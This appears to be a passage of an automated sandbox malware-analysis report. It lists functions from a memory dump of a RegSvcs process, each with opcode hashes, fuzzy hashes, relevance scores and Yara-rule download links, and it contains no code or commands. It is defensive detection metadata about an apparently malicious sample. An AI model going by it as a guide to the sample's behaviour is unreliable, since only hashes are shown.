                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 70dc7473f89b1306303483851018f90f4ab490e341552fdd9566dc20879b1df9
                                                                                                                              • Instruction ID: 276b1ffc9e4bde6d8f80bd75f94c59a089b9d92f5c85d1d0fe129b61205ef2cc
                                                                                                                              • Opcode Fuzzy Hash: 70dc7473f89b1306303483851018f90f4ab490e341552fdd9566dc20879b1df9
                                                                                                                              • Instruction Fuzzy Hash: AC319631740706ABD722AFA58C41FAF76A9FB68B50F110429F600AF3D1DAB4DC0087A0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01514B4B Relevance: .1, Instructions: 104COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 78b40263b90c8e0a7a144cfbf8b89ae9a8ba804ed8da679bd414c922f5d39016
                                                                                                                              • Instruction ID: fcd0cd2e6bd0bc84c1d21609098e99bc8d74ec9491e8550ffb2f6a1853a16554
                                                                                                                              • Opcode Fuzzy Hash: 78b40263b90c8e0a7a144cfbf8b89ae9a8ba804ed8da679bd414c922f5d39016
                                                                                                                              • Instruction Fuzzy Hash: FB31D2322052018FD722DF1DD890E6AB7E5FB80364F5A586EE9958F259D730E804DF91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01464260 Relevance: .1, Instructions: 102COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 76f3d4e1bea6e1e423b41aef3f450f29062a63aed625e60b5ea4d3fa06ed9343
                                                                                                                              • Instruction ID: 6086bdcd875ec207e6fd8ab11ccf987c04d58aee8253178bbc1b4058c1199c47
                                                                                                                              • Opcode Fuzzy Hash: 76f3d4e1bea6e1e423b41aef3f450f29062a63aed625e60b5ea4d3fa06ed9343
                                                                                                                              • Instruction Fuzzy Hash: 6E41C079200B45DFDB62CF28C980BD7BBE9AB58714F15842EE65A8B370D770E844CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01514BB0 Relevance: .1, Instructions: 101COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3c5aa68b789b48c24ca1ffbbcaa6f30071e40ff81128e64df15c8edf97ff220b
                                                                                                                              • Instruction ID: eb62dc747fbb9baf2d07cf685377b2db628dae4176f48b7a5bbd0a04484cd0ae
                                                                                                                              • Opcode Fuzzy Hash: 3c5aa68b789b48c24ca1ffbbcaa6f30071e40ff81128e64df15c8edf97ff220b
                                                                                                                              • Instruction Fuzzy Hash: 5A317C716043028FE721DF29C890E6AB7E5FB84724F06496DE9659F399E730E805CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014DEB1D Relevance: .1, Instructions: 100COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 21259afb8318afb7ff01a315850092234e2d71543419f725575c6f44f7fa5317
                                                                                                                              • Instruction ID: 9aab755896f7ffee46f0c4ada556460fc37f9ce805b18202b2979d46e143a990
                                                                                                                              • Opcode Fuzzy Hash: 21259afb8318afb7ff01a315850092234e2d71543419f725575c6f44f7fa5317
                                                                                                                              • Instruction Fuzzy Hash: 813107313016829BFB22D75DCD68B567BD8BB10B40F1900A6AB45AF7F2D738E841C321
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 015261C3 Relevance: .1, Instructions: 97COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3341d018895e800a32ff6280c39fef692fd150c50622a82f4986dd9238243a1b
                                                                                                                              • Instruction ID: 88421d10dd717ccf9cf74ce4756b4fae35428acc2bed74cff5254a93a3d16449
                                                                                                                              • Opcode Fuzzy Hash: 3341d018895e800a32ff6280c39fef692fd150c50622a82f4986dd9238243a1b
                                                                                                                              • Instruction Fuzzy Hash: 5131C476A00266ABDB15DF98CC40BAEB7B5FB45740F554169E900AF294D770ED00CBA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0150483A Relevance: .1, Instructions: 96COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0056408b052a8271fcc0d712208ef85e743cde9a4a4cb750cb25b0c06449f3ee
                                                                                                                              • Instruction ID: ad408a5e0a0bcd32d1354c3cef85005c4c9aca691f8d6bce673023046ab3b81d
                                                                                                                              • Opcode Fuzzy Hash: 0056408b052a8271fcc0d712208ef85e743cde9a4a4cb750cb25b0c06449f3ee
                                                                                                                              • Instruction Fuzzy Hash: F6318776A4012DABCF22DF95DD44BDE7BB9BB98310F1504A5A608A7260CB30DE51CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0148EB20 Relevance: .1, Instructions: 96COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1ff93f7a4ea691a82f705e4c9a81aa6369518265a386299f5d44b308b5985c47
                                                                                                                              • Instruction ID: d9cd8501771f54400a377430a88c4fdb9348d1e0b2010ca735b1f18ae6897e81
                                                                                                                              • Opcode Fuzzy Hash: 1ff93f7a4ea691a82f705e4c9a81aa6369518265a386299f5d44b308b5985c47
                                                                                                                              • Instruction Fuzzy Hash: 1131C772E00215AFDB21EFA9CC40AAFBBF9EF54750F01442BE516E7260D2749E019BA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 015260B8 Relevance: .1, Instructions: 95COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9a387856ced447399bae37429793b71155cee28e072c92b7cd699fdd0a1f5e53
                                                                                                                              • Instruction ID: bb6640349ba0526f758c838c2e4ce448694303a84bb85c5e68ab23684016fa8c
                                                                                                                              • Opcode Fuzzy Hash: 9a387856ced447399bae37429793b71155cee28e072c92b7cd699fdd0a1f5e53
                                                                                                                              • Instruction Fuzzy Hash: 5831C472A00626EFD7229F99C850A6EB7B9BB55754F21046EE905DF3A2DA70EC008790
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014607AF Relevance: .1, Instructions: 95COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7daa3d5d1680dbec1ecb2aff0e399efbcd2c14788d659b55943ce3da1b86a0f2
                                                                                                                              • Instruction ID: ce225ee24f07637d696f7dc7b82735aefbcd117cde4cad74d352a607138db6bb
                                                                                                                              • Opcode Fuzzy Hash: 7daa3d5d1680dbec1ecb2aff0e399efbcd2c14788d659b55943ce3da1b86a0f2
                                                                                                                              • Instruction Fuzzy Hash: F431C872A04712DBC712DE29C8809ABBBA9AFE4654F01452FFD55A7331DA30DC0187E3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01468550 Relevance: .1, Instructions: 94COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6d248a7a2b03e97e32c0ff95f38ac18d2b04afb8c3779edc1a4af47779c91af2
                                                                                                                              • Instruction ID: 8bd248f241f0606372ac1b0d1ae089bf83aa35f3c35fae08f42dd9df6cee5b32
                                                                                                                              • Opcode Fuzzy Hash: 6d248a7a2b03e97e32c0ff95f38ac18d2b04afb8c3779edc1a4af47779c91af2
                                                                                                                              • Instruction Fuzzy Hash: CC3182B55053028FE760CF1AC840B2BBBE5FB98B04F15496FEA8597361D7B0E944CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0149A6C7 Relevance: .1, Instructions: 92COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                              • Instruction ID: c859be4a68baf2d66956b8cc63665b4713ad2f9cdb306439f79c3b73cc2421dd
                                                                                                                              • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                              • Instruction Fuzzy Hash: B63130B2B00701AFDB61CF6DDD41B57BBF8BB18650F15096EA55AC3761E630E900CB60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0150EBD0 Relevance: .1, Instructions: 91COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a0aa169c10111accd4c088853fad73a0bd3f2a8b5975a74fb512f79e290d1efa
                                                                                                                              • Instruction ID: 0a7f6f4afe5936399150c697cfa7e28ecd6a13da42762b9ce4b56bd208b1e5ec
                                                                                                                              • Opcode Fuzzy Hash: a0aa169c10111accd4c088853fad73a0bd3f2a8b5975a74fb512f79e290d1efa
                                                                                                                              • Instruction Fuzzy Hash: 1E31CCB1605341CFC712DF19C54195ABBF2FF99214F544DAEE888AF291D332DA44CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0148438F Relevance: .1, Instructions: 89COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 56c384527772806ca6fc71912d36c3fb2fdbbee94b60fe222c9972b0ba157f12
                                                                                                                              • Instruction ID: b4548a29bb5a843e6d1bf8b0a7c5f3fd36196f4618823981be893231c5c8b3ae
                                                                                                                              • Opcode Fuzzy Hash: 56c384527772806ca6fc71912d36c3fb2fdbbee94b60fe222c9972b0ba157f12
                                                                                                                              • Instruction Fuzzy Hash: C031E072B002069FD720EFA9C981B6EBBF9EBA0B04F18843BD105D7660D730E945CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0145CB7E Relevance: .1, Instructions: 89COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                              • Instruction ID: 8fe14ccb9a43ae0e8eeb110a888c50732e12916510eb36882b08dddc665b36c8
                                                                                                                              • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                              • Instruction Fuzzy Hash: A621F236E0125AAADB119BB98880BEFBBB9AF14740F158036DE15E7360E270D90187A0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0145C156 Relevance: .1, Instructions: 88COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 242d37610b40109fc029dd78ff78456bf628db0409fe908685b5d936dff6d85f
                                                                                                                              • Instruction ID: 50200ee3f574b8a6ca99a9a6ff25786c0f75095b0d125cc51db369d7fc7eb701
                                                                                                                              • Opcode Fuzzy Hash: 242d37610b40109fc029dd78ff78456bf628db0409fe908685b5d936dff6d85f
                                                                                                                              • Instruction Fuzzy Hash: BB312C719003518BD721AF58CC90BE97774EF50318F5481AFD94A9F362DA749986CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0151C3CD Relevance: .1, Instructions: 88COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                              • Instruction ID: e59daac1783ba313d5baa4821750ed4936f01e14da854ec9c6377048473701f7
                                                                                                                              • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                              • Instruction Fuzzy Hash: 91214D3A6806536AEB16AB958840BBABBB4FF90711F40801FFA558F661E676D940C360
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0145E420 Relevance: .1, Instructions: 88COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 39788ebe016977a224020cf499462f46b625e813fe2e24f1d089b87975c06a67
                                                                                                                              • Instruction ID: d287be72b845170770989457ddc2f2b503cca1f906e001fb46af44ee2ade0c72
                                                                                                                              • Opcode Fuzzy Hash: 39788ebe016977a224020cf499462f46b625e813fe2e24f1d089b87975c06a67
                                                                                                                              • Instruction Fuzzy Hash: 1231D831A0011C9BDB31DF19CC41FEEBBB9AB25744F4101A6EA45B72A1D6749F818F91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01494588 Relevance: .1, Instructions: 87COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                              • Instruction ID: b0323c752e2c3837af0675a9451e48051f6b9c5093813b811833946dd966cc95
                                                                                                                              • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                              • Instruction Fuzzy Hash: E121A271A00605EBCF14CF59CA80A8ABFA5FF58310F14816AEE199F250D674DE02CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014944B0 Relevance: .1, Instructions: 87COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8b3c741a61dddf82207ed29c83f3ee2aa411c54a023da5b74182c2259bffe1d7
                                                                                                                              • Instruction ID: 51be965f454dda76974faec19239c84439b79c706475996b9702809983aa7aff
                                                                                                                              • Opcode Fuzzy Hash: 8b3c741a61dddf82207ed29c83f3ee2aa411c54a023da5b74182c2259bffe1d7
                                                                                                                              • Instruction Fuzzy Hash: 6021E3726047059BCB22DF59C940B6B7BE4FB88760F09451AFE549B351C730E9028BA2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0145E388 Relevance: .1, Instructions: 86COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                              • Instruction ID: 177bbe39b06eb39c06545d442b6fd35a5f4d8b8df1c4ed94b4609bdfd20c652b
                                                                                                                              • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                              • Instruction Fuzzy Hash: 4C319E31600605EFE711CF69C984F6AB7B9FF45354F1045AAE9129B2A2E770EE02CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014DE609 Relevance: .1, Instructions: 86COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ebe55242c331c37f7d61c4a8d918e2d8323e1cebe6175b5f52b305b0679640f5
                                                                                                                              • Instruction ID: e45f8cac8eb2e7832054715393898957674882789541a114853a433fc6eafdd8
                                                                                                                              • Opcode Fuzzy Hash: ebe55242c331c37f7d61c4a8d918e2d8323e1cebe6175b5f52b305b0679640f5
                                                                                                                              • Instruction Fuzzy Hash: DA31B175A00245DFCF14CF1CC8A49AEB7B5FF84704B95845AE809AF3A1E731EA41CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014E06F1 Relevance: .1, Instructions: 79COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a4b0cb1bc69a4d84f795cf71a63c9573365fc4a0c04afb1d51f57f64a6d25e2a
                                                                                                                              • Instruction ID: 58322dc5b2a2a3d2da8de43c63159b53f1b48df2788872d58469571d5b4e4fcd
                                                                                                                              • Opcode Fuzzy Hash: a4b0cb1bc69a4d84f795cf71a63c9573365fc4a0c04afb1d51f57f64a6d25e2a
                                                                                                                              • Instruction Fuzzy Hash: B1219471A002299BCF20DF59C881ABEB7F4FF58740B55006AF551BB250D778AD42CFA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014E019F Relevance: .1, Instructions: 78COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e6190f6b6dbbf55b3d77d5b98bb30146a7d67ec105d29e67f0fa7ed6b1718f08
                                                                                                                              • Instruction ID: 839f33adf374c345d023615e145b1fb83cbb124710ee06f6c0966c008609e13f
                                                                                                                              • Opcode Fuzzy Hash: e6190f6b6dbbf55b3d77d5b98bb30146a7d67ec105d29e67f0fa7ed6b1718f08
                                                                                                                              • Instruction Fuzzy Hash: 7521A972A00645AFD715DF69C984B6AB7E8FF68740F14006AF904DB7A0E674ED01CBA8
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014E0283 Relevance: .1, Instructions: 74COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4ee671e4f37e5188a52dabe75da19f7a4ae1634c1a080161a8035bfebcbd1f7a
                                                                                                                              • Instruction ID: 87e71d87d462b4b17111c0a00b3268c0189f060c78107b13b42b39adc2d657f0
                                                                                                                              • Opcode Fuzzy Hash: 4ee671e4f37e5188a52dabe75da19f7a4ae1634c1a080161a8035bfebcbd1f7a
                                                                                                                              • Instruction Fuzzy Hash: B321D072A043469FE711EF5AC848B9BBBECAFA1640F08045BBDA0C7271D770C905C6A2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01482835 Relevance: .1, Instructions: 73COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7502b8279e0c3edab3305c4b63e0bddfccbb421ef5bd2f4d15a42967d534cdae
                                                                                                                              • Instruction ID: 7511d63af607107973ec96cd3e32c498fce12c886b088ec4099ccc724f391bf3
                                                                                                                              • Opcode Fuzzy Hash: 7502b8279e0c3edab3305c4b63e0bddfccbb421ef5bd2f4d15a42967d534cdae
                                                                                                                              • Instruction Fuzzy Hash: F2210A316156869BF722A72D8D04F193B95AB41B64F28036AF9209B7F2E7B8C843C241
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0149A30B Relevance: .1, Instructions: 70COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: bd869c32d7eacd8448364a8a390c852d77560d16575dcb45151439a7c052ac26
                                                                                                                              • Instruction ID: 945a2151f0736d0904bf38dac41c7f8804185c1f92d1c16ac72584c5660680d1
                                                                                                                              • Opcode Fuzzy Hash: bd869c32d7eacd8448364a8a390c852d77560d16575dcb45151439a7c052ac26
                                                                                                                              • Instruction Fuzzy Hash: 4621BB35200A419FCB25DF2ACC10B56B7F5FF58B04F24846EA509CBB61E331E842CB94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0151A49A Relevance: .1, Instructions: 70COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
